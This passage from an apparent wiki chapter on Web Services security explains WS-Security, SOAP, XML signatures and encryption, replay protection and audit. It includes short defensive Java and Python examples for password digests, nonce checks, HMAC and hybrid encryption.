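    // Restore the original bytes from the text form.
    public static byte[] decodeToken(String encoded) {
        return Base64.getDecoder().decode(encoded);
    }

    public static void main(String[] args) {
        byte[] original = "binary-certificate-bytes".getBytes(StandardCharsets.UTF_8);
        String wireForm = encodeToken(original);
        System.out.println(wireForm);
        System.out.println(new String(decodeToken(wireForm), StandardCharsets.UTF_8));
    }
}
```

WS-Security’s BinarySecurityToken element carries exactly this kind of Base64-encoded payload.&lt;br /&gt;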
Second, passing credentials carries an inherent risk of their disclosure – either by sniffing them during wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted or never sent “in the clear” at all. The usual ways to avoid sending sensitive credentials are cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
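As a concrete example of hashing instead of sending a clear-text password, the WS-Security UsernameToken profile defines a password digest computed as Base64(SHA-1(nonce + created + password)). A minimal Java sketch (the class name is illustrative):&lt;br /&gt;

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Base64;

// Sketch of the WSS UsernameToken password digest: the clear-text
// password never travels on the wire, and the nonce and creation
// timestamp make each digest value unique.
public class PasswordDigest {

    public static String digest(byte[] nonce, String created, String password)
            throws Exception {
        MessageDigest sha1 = MessageDigest.getInstance("SHA-1");
        sha1.update(nonce);                                        // random per-message nonce
        sha1.update(created.getBytes(StandardCharsets.UTF_8));     // creation timestamp
        sha1.update(password.getBytes(StandardCharsets.UTF_8));    // the secret itself
        return Base64.getEncoder().encodeToString(sha1.digest());
    }
}
```

The server, which knows the password, recomputes the same digest from the received nonce and timestamp and compares the results.&lt;br /&gt;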
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
The usual means of protecting against replayed messages are either using unique identifiers (nonces) on messages and keeping track of the ones already processed, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may simply state the instant the message was created, or carry additional information, like its expiration time or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew”, where server or client clocks drift too much, preventing timely message delivery – although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may expire while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
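The two techniques above can be combined on the server side. The following Java sketch (a hypothetical helper, not part of any toolkit) rejects messages whose timestamp falls outside a validity window and keeps a cache of already-seen nonces:&lt;br /&gt;

```java
import java.time.Duration;
import java.time.Instant;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Illustrative replay guard: a timestamp validity window plus a cache
// of recently seen nonces.
public class ReplayGuard {
    private final Duration window;
    private final Map<String, Instant> seenNonces = new ConcurrentHashMap<>();

    public ReplayGuard(Duration window) {
        this.window = window;
    }

    // Accept a message only if its creation time is inside the window
    // (allowing for some clock skew) and its nonce is new.
    public synchronized boolean accept(String nonce, Instant created, Instant now) {
        if (created.isBefore(now.minus(window)) || created.isAfter(now.plus(window))) {
            return false; // expired, or implausibly future-dated (clock skew)
        }
        // Evict nonces old enough that the window check alone would
        // already reject any replay of them.
        seenNonces.values().removeIf(t -> t.isBefore(now.minus(window)));
        // putIfAbsent returns null only if the nonce was not seen before.
        return seenNonces.putIfAbsent(nonce, created) == null;
    }
}
```

Evicting expired nonces keeps the cache bounded, which is what makes the nonce-tracking approach practical for a busy server.&lt;br /&gt;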
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “do I trust the caller?” and “did the caller create this message?” Assuming that caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). An alteration may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually mechanisms like checksums applied to ensure a packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably traced back to the issuer. The required association may be established by utilizing an HMAC, or by combining message digests with either cryptographic signatures or secret-key encryption (assuming the keys are known only to the two communicating parties), to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
&lt;br /&gt;
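A minimal Java sketch of the HMAC approach, using the JDK’s built-in HmacSHA256 implementation (the class name is illustrative): the tag is bound to the shared secret, so a tampered message, or a swapped digest, fails verification.&lt;br /&gt;

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

// Illustrative message integrity check via HMAC over the message body.
public class MessageHmac {

    // Compute the keyed tag the sender attaches to the message.
    public static byte[] sign(byte[] key, String message) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        return mac.doFinal(message.getBytes(StandardCharsets.UTF_8));
    }

    // Recompute the tag on the receiving side and compare.
    public static boolean verify(byte[] key, String message, byte[] tag) throws Exception {
        // MessageDigest.isEqual performs a time-constant comparison,
        // avoiding a timing side channel.
        return MessageDigest.isEqual(sign(key, message), tag);
    }
}
```

Unlike a plain digest, an attacker who alters the message cannot produce a matching tag without knowing the shared key.&lt;br /&gt;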
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
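The hybrid pattern just described can be sketched with the JDK’s built-in providers: a one-time AES session key encrypts the bulk payload, and only that small key is wrapped with the recipient’s RSA public key. (AES-GCM is used for the symmetric step here as a modern illustration; this is not what the XML Encryption standard of the time mandated, and the class name is illustrative.)&lt;br /&gt;

```java
import java.nio.charset.StandardCharsets;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.SecureRandom;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

// Illustrative hybrid encryption: symmetric key for the bulk data,
// asymmetric key only for protecting the small session key.
public class HybridEncryption {

    public static String roundTrip(String message) throws Exception {
        // Recipient's long-lived RSA key pair.
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(2048);
        KeyPair rsaKeys = kpg.generateKeyPair();

        // One-time AES session key for this exchange only.
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(128);
        SecretKey sessionKey = kg.generateKey();

        // 1. Sender: encrypt the bulk payload with the fast symmetric key.
        byte[] iv = new byte[12];
        new SecureRandom().nextBytes(iv);
        Cipher aes = Cipher.getInstance("AES/GCM/NoPadding");
        aes.init(Cipher.ENCRYPT_MODE, sessionKey, new GCMParameterSpec(128, iv));
        byte[] encryptedBody = aes.doFinal(message.getBytes(StandardCharsets.UTF_8));

        // 2. Sender: wrap the session key with the recipient's public key.
        Cipher rsa = Cipher.getInstance("RSA");
        rsa.init(Cipher.WRAP_MODE, rsaKeys.getPublic());
        byte[] wrappedKey = rsa.wrap(sessionKey);

        // 3. Recipient: unwrap the session key with the private key,
        //    then decrypt the bulk payload.
        rsa.init(Cipher.UNWRAP_MODE, rsaKeys.getPrivate());
        SecretKey recovered = (SecretKey) rsa.unwrap(wrappedKey, "AES", Cipher.SECRET_KEY);
        Cipher aesDec = Cipher.getInstance("AES/GCM/NoPadding");
        aesDec.init(Cipher.DECRYPT_MODE, recovered, new GCMParameterSpec(128, iv));
        return new String(aesDec.doFinal(encryptedBody), StandardCharsets.UTF_8);
    }
}
```

The session key is discarded after the exchange, matching the different lifecycles of encryption and signing keys discussed below.&lt;br /&gt;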
Applying encryption requires conducting an extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – traditional HTTP firewalls do not help stop attacks against Web Services. An organization would need an XML/SOAP firewall, capable of conducting application-level analysis of the web server’s traffic and making intelligent decisions about passing SOAP messages to their destination. The reader should refer to other books and publications on this very important topic, as it is impossible to cover it within a single chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required by audits, is reconstructing the chain of events that led to a certain problem. Normally, this is achieved by saving server logs in a secure location, available only to IT administrators and system auditors, in order to create what is commonly referred to as an “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following standard legal practice, electronic documents now require some form of “electronic signature”, but that definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as Web Services are concerned, such a level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile: XML-based communication, described by an XML-based grammar called the Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces – consisting of messages expressed as XML Schema, and operations – to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over the HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations that develop and promote them. There are quite a few industry-wide groups and consortiums working in this area, the most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the best-known industry group; it owns many Web-related standards and develops them in a Working Group format. Of particular interest to this chapter are the XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in W3C jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related ones. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards it intends to develop. Of interest for this discussion, OASIS owns the WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
The Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Its work mostly consists of taking other broadly accepted standards and developing so-called profiles – sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS WS-Security standard and specifies sets of optional and required security features for Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
The Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is general rather than strictly Web Service-specific, it is important for this topic because of its close relation to the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of the software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join to work on a particular issue or proposal. Results of these joint activities, once they reach a certain maturity, are often submitted to standards committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into a Header and a Body, can in theory be transmitted over a number of transport protocols, but only the HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and for Document-style communication, with message contents based exclusively on the XML Schema definitions in the Web Service’s WSDL. Invocation results may optionally be returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
The SOAP protocol, while defining the communication framework, provides no help in securing message exchanges – communications must either happen over secure channels, or use the protection mechanisms described later in this chapter. &lt;br /&gt;
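As a concrete illustration, a Document-style exchange boils down to POSTing an XML envelope over HTTP. The minimal Python sketch below builds such a request without sending it; the endpoint, namespace, and GetQuote operation are made up for illustration and do not come from any real service:&lt;br /&gt;

```python
# Minimal sketch of a Document-style SOAP 1.1 request.
# ENDPOINT, NS, and the GetQuote operation are hypothetical.
ENDPOINT = "https://example.com/StockService"  # hypothetical service URL
NS = "urn:example:stock"                       # hypothetical target namespace

def build_envelope(symbol: str) -> bytes:
    """Wrap an operation-specific payload in a bare SOAP 1.1 envelope."""
    envelope = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        "<soap:Header/>"
        "<soap:Body>"
        f'<GetQuote xmlns="{NS}"><symbol>{symbol}</symbol></GetQuote>'
        "</soap:Body>"
        "</soap:Envelope>"
    )
    return envelope.encode("utf-8")

# SOAP 1.1 over HTTP uses POST with text/xml and a SOAPAction header.
headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": f'"{NS}/GetQuote"',
}
body = build_envelope("ACME")
```

Note that nothing in this envelope is protected yet – that is exactly the gap the mechanisms discussed below are meant to fill.&lt;br /&gt;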
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/&amp;lt;/u&amp;gt;) and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications provide integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or of individual elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of these standards comes from the highly flexible framework they define for referencing the data being processed (both internal and external to the XML document), for referring to the secret keys and key pairs, and for representing the results of signing/encrypting operations as XML that is added to, or substituted in, the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications currently being developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with input from Verisign, RSA Security, and other participants, developed a family of specifications collectively known as the “Web Services Roadmap”. Its foundation, WS-Security, was submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still in various stages of development, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al.), trust and security token exchange (WS-Trust), and establishing context for secure conversation (WS-SecureConversation). One specification in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is unclear at the moment, since it has been significantly delayed and presently lacks industry momentum.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
The WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of the “Roadmap”, which was later renamed the Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. The current version is 1.0; work on version 1.1 of the specification is under way and is expected to finish in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
The flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols as they are developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standard are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens passed in WSS messages, and the ways of attaching them to the message, may vary substantially. At a high level, the WSS standard defines three types of security tokens attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of these types is further specified in one or more profile documents, which define the additional attributes and elements needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is to provide tools for message-level communication protection, where each message represents an isolated piece of information, carrying enough security data to verify all important message properties – authenticity, integrity, freshness – and to initiate decryption of any encrypted message parts. This stands in stark contrast to traditional channel security, which applies a pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data to higher-level protocols. Those protocols, based on standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard-to-detect problems, as discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents: one core document, which defines how security headers may be included in a SOAP envelope and describes all the high-level blocks that must be present in a valid security header, and several profile documents, which have the dual task of extending the definitions for the token types they deal with – providing additional attributes and elements – and of defining relationships left out of the core specification, such as the use of attachments.&lt;br /&gt;
&lt;br /&gt;
The core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt;, which specifies how X.509 certificates may be passed in the BinarySecurityToken defined by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WS-Security with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc.; and message data, i.e., everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides a straightforward conversion from binary to ASCII format and back. The example below demonstrates what binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver knows which decoder to apply in order to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
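The Base64 transform itself is available in the standard library of most languages; a minimal Python sketch of the round trip a WSS processor performs on binary token data:&lt;br /&gt;

```python
import base64

# Arbitrary binary data, standing in for e.g. the DER bytes of a
# certificate or the raw bytes of a cryptographic signature.
raw = bytes(range(16))

# Encode for embedding in an XML element (pure ASCII, XML-safe) ...
encoded = base64.b64encode(raw).decode("ascii")

# ... and decode on the receiver's side to recover the original bytes.
decoded = base64.b64decode(encoded)

assert decoded == raw
```

Base64 expands the data by roughly one third (every 3 input bytes become 4 output characters), which is the price paid for carrying binary content inside a text-only format.&lt;br /&gt;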
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message works somewhat like an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well: the letter (SOAP message) should not know, nor care, about its envelope (WSS Header), since the different units of information carried on the envelope and in the letter are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (in SOAP 1.1) or roles (in SOAP 1.2). Their contents may also refer to each other, but such references present a very complicated logistical problem for determining the proper order of decryption and signature verification, and should generally be avoided. The WSS security header itself has a loose structure, as the specification does not require any elements to be present – so a minimalist header in an empty message will look like this:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        ''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, the header must carry some information that helps to secure the message. This means including one or more security tokens (see 0) with references, plus XML Signature and XML Encryption elements if the message is signed and/or encrypted. So, a typical header will look more like the following: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... ''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  ''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:EncryptedKey&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
